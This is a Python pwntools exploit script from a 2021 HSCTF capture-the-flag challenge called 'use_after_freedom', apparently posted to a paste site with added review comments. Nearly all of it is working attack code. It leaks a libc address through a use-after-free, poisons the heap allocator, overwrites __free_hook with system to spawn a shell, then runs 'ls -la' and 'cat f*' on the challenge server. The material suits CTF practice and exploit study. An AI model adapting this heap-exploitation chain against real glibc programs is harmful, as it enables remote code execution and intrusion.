tacbliw

use after freedom

Jun 15th, 2021
#!/usr/bin/env python3
from pwn import *
import argparse
import os

# alias "pwninit"="pwninit --template-path=~/tools/ctf/scripts/pwn/pwninit/base.py"

# Endpoint used when the script is started with -r/--remote.
REMOTE_SERVER = "use-after-freedom.hsc.tf"
REMOTE_PORT = 1337

# Commands handed to gdb.attach() for local runs. The hard-coded binary
# path only matches the author's checkout; ignoring SIGALRM suggests the
# target arms an alarm (inferred, not visible here).
GDB_SCRIPT = """
handle SIGALRM ignore
tracemalloc on
breakrva 0x10EB /root/ctf/hsctf21/useafterfreedom/use_after_freedom
"""

# The three ELF images the rest of the script refers to. checksec output is
# silenced; libc/ld paths are pinned to one specific 2.27 build, so the
# constants used later only hold for that build.
exe = ELF("./use_after_freedom", checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so", checksec=False)
ld = ELF("/lib/x86_64-linux-gnu/ld-2.27.so", checksec=False)

# Make pwntools derive arch/endianness/word size from the target binary.
context.binary = exe

def get_process(is_remote=None):
    """Open the tube the rest of the script talks to.

    A truthy ``is_remote`` yields a TCP connection to REMOTE_SERVER:REMOTE_PORT;
    otherwise the local binary is spawned with the pinned libc injected via
    LD_PRELOAD so its layout matches the one the script was written against.
    """
    if is_remote:
        return remote(REMOTE_SERVER, REMOTE_PORT)
    return process([exe.path], env={"LD_PRELOAD": libc.path})

def attach_gdb(p, remote=None):
    """Attach gdb (running GDB_SCRIPT) to ``p`` for local runs only.

    A truthy ``remote`` makes this a no-op. Note the parameter shadows
    pwntools' ``remote()`` inside this function; it is not called here.
    """
    if remote:
        return
    gdb.attach(p, gdbscript=GDB_SCRIPT)

def create(p, size, data=''):
    """Walk the target's "create" dialogue on tube ``p``.

    Answers three ``> `` prompts in order: menu option ``1``, the decimal
    ``size``, then ``data``. Every answer goes through ``sendlineafter``,
    so a newline is appended to each one, ``data`` included.
    """
    for answer in ('1', str(size), data):
        p.sendlineafter('> ', answer)

def delete(p, idx):
    """Send menu option ``2`` and then the decimal index ``idx`` on tube ``p``.

    Both answers are newline-terminated replies to a ``> `` prompt.
    """
    for answer in ('2', str(idx)):
        p.sendlineafter('> ', answer)

def edit(p, idx, data):
    """Send menu option ``3``, the index ``idx``, then the raw ``data`` on tube ``p``.

    The option and index are newline-terminated; ``data`` is written with
    ``sendafter`` so no newline is appended and the payload length is exact.
    """
    for answer in ('3', str(idx)):
        p.sendlineafter('> ', answer)
    p.sendafter('> ', data)

def show(p, idx):
    """Send menu option ``4`` followed by the decimal index ``idx`` on tube ``p``.

    Reading whatever the target prints back is left to the caller.
    """
    for answer in ('4', str(idx)):
        p.sendlineafter('> ', answer)


# Entry point: drives the target's menu over the tube from get_process() and,
# on any failure, closes the tube and restarts the whole sequence on a fresh
# connection. The statement order is the protocol; it is left untouched.
if __name__ == '__main__':
    count = 0
    while 1:
        count += 1
        # NOTE(review): the parser is rebuilt and argv re-parsed on every
        # round; hoisting these three lines above the loop is equivalent.
        parser = argparse.ArgumentParser()
        parser.add_argument("-r", "--remote", action='store_true', dest='remote', help="Run in remote")
        args = parser.parse_args()

        p = get_process(args.remote)


        try:
            print("Round number", count)
            create(p, 0x418, 'AAAABBBB')
            create(p, 0x18, '/bin/sh\0')

            delete(p, 0)
            show(p, 0)
            # recvline() returns the trailing newline too: drop it and
            # zero-pad to 8 bytes so u64() accepts a short line.
            leakh = u64(p.recvline()[:-1].ljust(8, b'\x00'))# - 0x7faaacba0ca0
            # Constant presumably tied to the exact libc-2.27 build loaded at
            # module level; a different build needs a different value.
            libc.address = leakh - 0x3ebca0
            success(hex(leakh))
            success(hex(libc.address))

            delete(p, 1)
            edit(p, 1, "C"*8)
            show(p, 1)
            p.recvuntil("C"*8)
            leak = u64(p.recvline()[:-1].ljust(8, b'\x00'))
            success(hex(leak))

            # Keeps the high bits of `leak` and replaces the low ones with a
            # fixed value; the trailing comment is a sample the author saw.
            target = (leak & 0xfffff0000000) + 0x479f001 # 0x5607a479f001
            success(hex(target))
            edit(p, 0, p64(leakh) + p64(target))
            # Inline equivalent of create(p, 0x418, "E"*8).
            p.sendlineafter('> ', '1')
            p.sendlineafter('> ', str(0x418))
            p.sendlineafter("> ","E"*8)
            print("LOLLLL")
            # attach_gdb(p, args.remote)
            edit(p, 1, p64(libc.sym['__free_hook']))
            create(p, 0x18, '/bin/sh\0')
            create(p, 0x18, p64(libc.sym.system))
            delete(p, 4)
            print("DM ", count)
            p.recv()
            p.sendline("ls -la")
            p.sendline("cat f*")
            # Only the bytes from this single recv() are written to out.txt;
            # output arriving after it is not captured.
            r = p.recv()
            with open('out.txt', 'wb+') as f:
                f.write(r)
            break
        except KeyboardInterrupt:
            p.close()
            break
        # NOTE(review): a bare except also swallows SystemExit and
        # GeneratorExit; `except Exception:` is the narrower form that still
        # catches EOFError from the tube. The retry loop has no upper bound.
        except:
            print("FAILLLL")
            p.close()